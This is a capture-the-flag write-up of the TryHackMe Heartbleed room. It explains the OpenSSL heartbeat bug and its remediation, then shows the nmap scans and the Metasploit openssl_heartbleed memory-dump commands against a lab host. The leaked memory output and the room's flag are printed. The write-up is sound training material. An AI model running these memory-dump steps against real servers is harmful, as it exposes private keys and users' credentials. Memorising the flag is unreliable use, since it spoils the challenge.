25 Nov 2025
TryHackMe HeartBleed
Learn to detect and exploit the Heartbleed vulnerability (CVE-2014-0160) in this hands-on TryHackMe room. Master OpenSSL security and ethical hacking techniques today
Box Info
Introduction to Heartbleed and SSL/TLS
On the internet today, most web servers are configured to use SSL/TLS. SSL(secure socket layer) is a predecessor to TLS(transport layer security). The most common versions are TLS 1.2 and TLS 1.3(recently released). Configuring a web server to use TLS means that all communication from that particular server to a client will be encrypted; any malicious third party that has access to this traffic will not be able to understand/decrypt the traffic, and they also will not be able to modify the traffic. To learn more about how TLS connections are established, check 1.2 and 1.3 out.
Heartbleed is a bug due to the implementation in the OpenSSL library from version 1.0.1 to 1.0.1f(which is very widely used). It allows a user to access memory on the server(which they usually wouldn't have access to). This, in turn, allows a malicious user to access different kinds of information(that they wouldn't usually have access to due to the encryption and integrity provided by TLS), including:
Server private key
Confidential data like usernames, passwords, and other personal information
Analyzing the Bug
The implementation error occurs in the heartbeat message that OpenSSL uses to keep a connection alive even when no data is sent. A mechanism like this is important because if a connection dies/resets quite often, it would be expensive to set up the TLS aspect of the connection again; this affects the latency across the internet, and it would make using services slow for users. A heartbeat message sent by one end of the connection contains random data and the data's length; this exact data is sent back when received by the other end of the connection. When the server retrieves this message from the client, here's what it does:
The server constructs a pointer(memory location) to the heartbeat record
It then copies the length of the data sent by a user into a variable(called payload)
The length of this data is unchecked
The server then allocates memory in the form of:
1 + 2 + payload + padding(this can be maximum of 1 + 2 + 65535 + 16)
The server then creates another pointer(bp) to access this memory
The server then copies the payload number of bytes from data sent by the user to the bp pointer
The server sends the data contained in the bp pointers to the user.
With this, you can see that the user controls the amount and length of data they send over. If the user does not send over any data(where the length is 0), it means that the server will copy arbitrary memory into the new pointer(which is how it can access secret information on the server). When retrieving data this way, the data can be different with different responses as the memory on the server will change.
Remediation
To ensure that arbitrary data from the server isn't copied and sent to a user, the server needs to check the length of the heartbeat message:
The server needs to check that the length of the heartbeat message sent by the user isn't
The server needs to check the length doesn't exceed the specified length of the variable that holds the data
Reconnaisance
Nmap
┌──(hacker㉿hacker)-[/opt/ctf/heartbleed]
└─$ sudo rustscan -a 10.82.111.114 -- -sCV -oN nmap.txt
# Nmap 7.95 scan initiated Tue Nov 25 11:42:05 2025 as: /usr/lib/nmap/nmap -vvv -p 22,111,443,48305 -4 -sCV -oN nmap.txt 10.82.111.114
Nmap scan report for 10.82.111.114
Host is up, received echo-reply ttl 253 (0.15s latency).
Scanned at 2025-11-25 11:42:05 IST for 21s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 253 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 ae:1e:45:53:00:47:cb:b6:31:22:f2:65:c0:bb:15:30 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDq8crdRZdcnDxYjYbJVpC6d7BjkRIsUhK5tZt1Zt95WCfcVAj1E0D+bK/JcOcbch1ZVjKHd554KICIdXT+uHkg7mbU7tRKlFZftgLaWrmCHkfg1dA+FwisdEzDoEQX8nA1Q7YaZO+2/Akg0hQ7KxzWrIyhK3rq8NLVkpdZFmRDPhfoaQj3GG8zcjCBXlJ/8BnVtFlDu07DghEag4npbHTLvlzzmwOEnPUmlsXRVk9vMUaXCYrYQ0Rm/t/8tJp3Ti9GqTClrmzW/rex1Cp6rSLmMV6iJ+WR2vFrmAqvSv2cjxDnF297iSJhGm8TljaShoWgNtfMqWzniXpOLiEyuox3
| 256 c4:95:98:9c:ca:af:f4:5e:c3:a3:32:46:75:fc:f3:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMueUWGbdlBeuP5Zo3TjIOopOKh+LnEXYNVUy3OoJUQ81bMKY3+g8809bG42XhUvc5aJG/BYN83u2RWovDMJxG4=
| 256 59:23:ee:39:aa:01:81:54:cd:ea:27:c6:38:a9:ef:88 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDubcRk+23FYQ5Iz3G1ho2VUGn/9nBexWdtbMzu5ErMP
111/tcp open rpcbind syn-ack ttl 253 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 48305/tcp status
| 100024 1 50893/tcp6 status
| 100024 1 56651/udp6 status
|_ 100024 1 60404/udp status
443/tcp open ssl/http syn-ack ttl 253 nginx 1.15.7
|_http-server-header: nginx/1.15.7
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_ http/1.1
| http-methods:
|_ Supported Methods: GET HEAD
| ssl-cert: Subject: commonName=localhost/organizationName=TryHackMe/stateOrProvinceName=London/countryName=UK/organizationalUnitName=TryHackMe/localityName=London
| Issuer: commonName=localhost/organizationName=TryHackMe/stateOrProvinceName=London/countryName=UK/organizationalUnitName=TryHackMe/localityName=London
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-02-16T10:41:14
| Not valid after: 2020-02-16T10:41:14
| MD5: 4b3a:f45e:a597:6f3f:06f6:e9d2:518a:c1c4
| SHA-1: 01e8:fa58:e5a0:5102:d9e3:2ee3:8212:9d28:3934:4d57
| -----BEGIN CERTIFICATE-----
| MIIDqTCCApGgAwIBAgIJANbrflfhzmNCMA0GCSqGSIb3DQEBCwUAMGsxCzAJBgNV
| BAYTAlVLMQ8wDQYDVQQIDAZMb25kb24xDzANBgNVBAcMBkxvbmRvbjESMBAGA1UE
| CgwJVHJ5SGFja01lMRIwEAYDVQQLDAlUcnlIYWNrTWUxEjAQBgNVBAMMCWxvY2Fs
| aG9zdDAeFw0xOTAyMTYxMDQxMTRaFw0yMDAyMTYxMDQxMTRaMGsxCzAJBgNVBAYT
| AlVLMQ8wDQYDVQQIDAZMb25kb24xDzANBgNVBAcMBkxvbmRvbjESMBAGA1UECgwJ
| VHJ5SGFja01lMRIwEAYDVQQLDAlUcnlIYWNrTWUxEjAQBgNVBAMMCWxvY2FsaG9z
| dDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKNPQRA9EuSt88yrnnbi
| 0GxKE2L9E5cR0VocQNqXEyjKcGgAMgngP+4FtCc3+SkZ3MBoHcSk7NfcZtG7asYO
| 8uhcWYe8OjrGQxayAvu3+Et+93IhiTfAj2J+rPZ39vH0/BrHFx8jVty5buV65/Sp
| gIvPLoOTJMoSbITIRAuWbz6dUkrwplY54BPoCisG7OF6LUEFw5Mk2AvbGz3cViW2
| Aoh+/LoU7/b4PY3MUMXMaJ+BP+no381UgsWY3Z25vQ0FDhoAIu1UGP9UwzPYhi67
| giuaYxTcJ+C+RQClFCEh/CWOhAlFpiv5jPoMb+MydSqfNYGbZnVCUOtyOrzddqVz
| UFkCAwEAAaNQME4wHQYDVR0OBBYEFJSFOFjOlnq586iW1lKHV2Ra3PMtMB8GA1Ud
| IwQYMBaAFJSFOFjOlnq586iW1lKHV2Ra3PMtMAwGA1UdEwQFMAMBAf8wDQYJKoZI
| hvcNAQELBQADggEBAKDbHJdeVUnCqHH1bgffyqH6sgUixnj3yDB35mvQkrZcopoT
| VQeHF9EudJJn4zSWRDwqbdJceQiBC13TTanYcWVIklMSVdVOXm0ELPJ8JaoUTCIo
| SfmiS5Brs5YT8pkxh/AmTclQ/nw2wfVmywHqJEHkjr/PuucPclqJ6VpmZ31bNOv1
| 3zPIXZ2FSRh5sl/t6XzhsiRQlhicowh7lOfRV+BaDvGOmYl5L6ip/7rgvlpE8Y4G
| yGsScGFxEz5SgJPQmYOYGxsb6Hwp2ZGFxLLUYLP6wwyegeyU8tHH5G7NR7F+55Xs
| 3eItjr429tcrE7aDJDlmkF8iLix+LBigl6b0wEM=
|_-----END CERTIFICATE-----
|_http-title: What are you looking for?
48305/tcp open status syn-ack ttl 253 1 (RPC #100024)
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 25 11:42:26 2025 -- 1 IP address (1 host up) scanned in 20.82 secondsScript Scan
# Nmap 7.95 scan initiated Tue Nov 25 11:45:35 2025 as: /usr/lib/nmap/nmap -p22,111,443 --script vuln -oN scirpScan.txt -vv 10.82.111.114
Nmap scan report for 10.82.111.114
Host is up, received reset ttl 253 (0.15s latency).
Scanned at 2025-11-25 11:45:45 IST for 692s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 253
111/tcp open rpcbind syn-ack ttl 253
443/tcp open https syn-ack ttl 253
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| http://www.cvedetails.com/cve/2014-0224
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://www.securityfocus.com/bid/49303
|_ https://www.tenable.com/plugins/nessus/55976
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://www.openssl.org/news/secadv_20140407.txt
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://cvedetails.com/cve/2014-0160/
|_http-csrf: Couldn't find any CSRF vulnerabilities.
Read data files from: /usr/share/nmap
# Nmap done at Tue Nov 25 11:57:17 2025 -- 1 IP address (1 host up) scanned in 701.95 secondsExploit (Metasploit)
After identifying this is vulnerable to heartbleed i immediately went to metasploit and there search for heartbleed and got an exploit
msf > search heartbleed
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/elasticsearch_memory_disclosure 2021-07-21 normal Yes Elasticsearch Memory Disclosure
1 \_ action: DUMP . . . Dump memory contents to loot
2 \_ action: SCAN . . . Check hosts for vulnerability
3 auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal No OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
4 auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal Yes OpenSSL Heartbeat (Heartbleed) Information Leak
5 \_ action: DUMP . . . Dump memory contents to loot
6 \_ action: KEYS . . . Recover private keys from memory
7 \_ action: SCAN . . . Check hosts for vulnerability
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/ssl/openssl_heartbleed
After interacting with a module you can manually set a ACTION with set ACTION 'SCAN'
msf auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 10.82.111.114
rhosts => 10.82.111.114
msf auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 10.82.111.114:443 - Heartbeat response with leak, 41635 bytes
[+] 10.82.111.114:443 - Heartbeat data stored in /root/.msf4/loot/20251125120516_default_10.82.111.114_openssl.heartble_427312.bin
[*] 10.82.111.114:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedIt show loot is in /root/.msf4/loot/20251125120516_default_10.82.111.114_openssl.heartble_427312.bin file
I cat that file and got our flag
┌──(root㉿hacker)-[/opt/ctf/heartbleed]
└─# cat /root/.msf4/loot/20251125120516_default_10.82.111.114_openssl.heartble_427312.bin
���i$�(;S��>A�'�Rh��]J�L�>▒$oA(��f��
�"�!98����5����
�� ��32��ED��/�A���
� �36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
user_name=hacker101&user_email=haxor@haxor.com&user_message=THM{sSl-Is-BaD}=74v�~`H���8��+ -3�������L�:��E!�1Z�
[...]
GET /uir//tmp/csman/0 HTTP/1.1
Host: 10.82.111.114
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
��5����
�,r[���?� Flag
Flag is THM{sSl-Is-BaD}
Similar Post
tryhackme 28 Nov 2025
TryHackMe Simple CTF
In this room, I discovered the box was susceptible to CVE-2019-9053. Exploiting this vulnerability allowed me to dump the database and crack the password for the user 'mitch'. After logging in via SSH, I enumerated the user's permissions and found 'mitch' could run vim as sudo. I utilized this GTFOBins technique to spawn a shell, successfully escalating privileges to root
